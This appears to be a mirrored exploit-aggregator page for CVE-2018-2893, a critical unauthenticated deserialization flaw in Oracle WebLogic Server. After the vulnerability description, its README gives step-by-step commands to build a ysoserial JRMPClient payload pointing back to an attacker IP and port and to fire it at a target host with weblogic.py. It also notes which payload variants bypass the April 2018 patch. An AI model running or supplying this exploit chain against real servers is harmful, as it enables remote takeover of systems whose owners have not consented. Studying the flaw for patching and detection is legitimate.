CVE-2018-2893 PoC — Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞

Source

https://github.com/pyn3rd/CVE-2018-2893

Associated Vulnerability

Title:Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞 (CVE-2018-2893)
Description:Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Description

CVE-2018-2893-PoC

Readme

# CVE-2018-2893

## Step 1

`java -jar ysoserial-cve-2018-2893.jar`

```
WHY SO SERIAL?
Usage: java -jar ysoserial-cve-2018-2893.jar [payload] '[command]'
Available payload types:
     Payload     Authors   Dependencies
     -------     -------   ------------
     JRMPClient  @mbechler
     JRMPClient2 @mbechler
     JRMPClient3 @mbechler
     JRMPClient4 @mbechler
     Jdk7u21     @frohoff
```

## Step 2

`java -jar ysoserial-cve-2018-2893.jar  JRMPClient4  "[IP]:[PORT]"  >  poc4.ser`

## Step 3

`python weblogic.py [HOST] [PORT] poc4.ser`


### Note: Any one of  JRMPClient2|JRMPClient3|JRMPClient4 can be utilized to  bypass the Critical Patch Update April 2018.

File Snapshot


 [4.0K]  /data/pocs/244a638aef772e906ffc4c0bd7c9223a5e25d046
├── [ 672]  README.md
├── [5.3K]  weblogic.py
└── [7.0M]  ysoserial-cve-2018-2893.jar

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!